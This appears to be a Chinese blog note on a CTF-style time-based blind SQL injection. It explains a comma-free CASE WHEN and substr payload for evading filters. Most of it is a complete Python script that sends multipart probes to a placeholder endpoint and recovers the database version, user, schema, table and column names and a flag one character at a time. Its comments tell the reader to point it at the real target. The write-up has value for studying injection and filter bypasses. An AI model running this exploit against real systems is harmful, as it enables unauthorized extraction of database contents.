SQL注入之盲注 case
遇到一个盲注,记录一下
在基于时间的盲注中，一般使用 if 语句：条件成立就 sleep。但在部分过滤了逗号的场景下，if(a,b,c) 无法使用，可以改用 `case when <condition> then ... else ... end` 语句代替；再配合 `substr(expr from pos for len)` 这种同样不带逗号的写法（下面脚本正是这样做的），整条探测语句就不再出现逗号。参考 http://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html。
需要将数据以 multipart/form-data 方式发送（下面脚本用 requests_toolbelt 的 MultipartEncoder 构造请求体）。
# coding=utf-8
import time
import requests
from requests_toolbelt import MultipartEncoder
# Injection endpoint; the host here looks like a placeholder from the write-up - point it at the real target.
url = "https://evil.com/aaaaa/aaaa.htm"
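def _build_payload(sql, position, code, delay=3):
    """Return the comma-free CASE WHEN payload for one (position, code) guess.

    The value under test is ``substr(<sql> FROM <position> FOR 1)`` so that
    neither the substring call nor the CASE expression needs a comma; the
    server sleeps ``delay`` seconds only when the character's ``ord()``
    equals ``code``.  ``sql`` is spliced in verbatim - this is the attack
    string sent to the target, not a parameterised query.
    """
    return (
        "G100000240' ||case when ord(substr({sql} from {position} for 1))={code} "
        "then sleep({delay}) else '1111111' end ||' "
    ).format(sql=sql, position=position, code=code, delay=delay)


def _post_and_time(payload):
    """POST ``payload`` as the multipart ``cateCode`` field to ``url``; return elapsed seconds.

    The response body is irrelevant for a time-based oracle, only the latency
    is.  ``timeout`` keeps a hung target from stalling the whole extraction
    forever; it is well above the injected sleep so a genuine hit is never cut
    off.  Raises ``requests.exceptions.Timeout`` if the target stops answering.
    """
    encoder = MultipartEncoder(fields={'cateCode': payload})
    started = time.time()
    requests.post(url, data=encoder,
                  headers={'Content-Type': encoder.content_type}, timeout=30)
    return time.time() - started


def get_info(sql, max_len=29, delay=3, threshold=None, probe=None):
    """Recover the result of ``sql`` one character at a time via time-based blind injection.

    For every position 1..``max_len`` and every printable ASCII code (32-126)
    one probe is sent; a response slower than ``threshold`` seconds means the
    injected ``sleep()`` fired, i.e. the guess was right.  Extraction stops at
    the first position where no code is a hit (end of the value).  Each hit is
    printed as ``position char`` exactly like the original script.

    Args:
        sql: SQL expression to extract, e.g. ``"version()"`` or a parenthesised
            scalar sub-select.  Spliced verbatim into the payload.
        max_len: highest position probed (default 29, the original ``range(1, 30)``).
        delay: seconds the injected ``sleep()`` waits on a correct guess.
        threshold: elapsed seconds above which a probe counts as a hit;
            defaults to ``delay - 0.1`` (2.9 for the default delay, as before).
        probe: optional callable ``probe(payload) -> elapsed_seconds``; useful
            for other injection points or for testing.  Defaults to POSTing the
            payload to the module-level ``url``.

    Returns:
        The recovered string (empty if nothing matched at position 1).

    Caveat: only latency is observed, so on a jittery link a non-sleeping
    probe can exceed the threshold and yield a false positive; raise ``delay``
    (and hence the threshold) on noisy networks.
    """
    if threshold is None:
        threshold = delay - 0.1
    if probe is None:
        probe = _post_and_time
    print(sql)
    recovered = []
    for position in range(1, max_len + 1):
        for code in range(32, 127):
            payload = _build_payload(sql, position, code, delay)
            if probe(payload) > threshold:
                print(position, chr(code))
                recovered.append(chr(code))
                break
        else:
            # No candidate slowed the response: the value ended before this position.
            break
    return "".join(recovered)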
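if __name__ == "__main__":
    # Guarded so the module can be imported (e.g. to reuse get_info) without
    # firing requests at the target.  Typical extraction order; uncomment the
    # step you need - each call walks the result character by character.
    # get_info("version()")
    # get_info("user()")
    # get_info("database()")
    # NOTE(review): ``limit 1,2`` asks for up to two rows, which a scalar
    # subquery inside substr() cannot return, and it reintroduces the comma the
    # CASE WHEN trick was chosen to avoid; ``limit 1 offset 1`` (as the
    # table_name step below does) is probably what is intended - confirm.
    get_info("(select distinct TABLE_SCHEMA from information_schema.tables limit 1,2)")
    # for i in range(2):
    #     get_info("(select table_name from information_schema.tables where table_schema='ip_db' limit 1 offset {offset})".format(offset=i))
    # get_info("(select column_name from information_schema.columns where table_name='flag' and table_schema='ip_db' limit 1)")
    # get_info("(select flag from ip_db.flag limit 1)")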
参考链接:
https://strcpy.me/index.php/archives/736/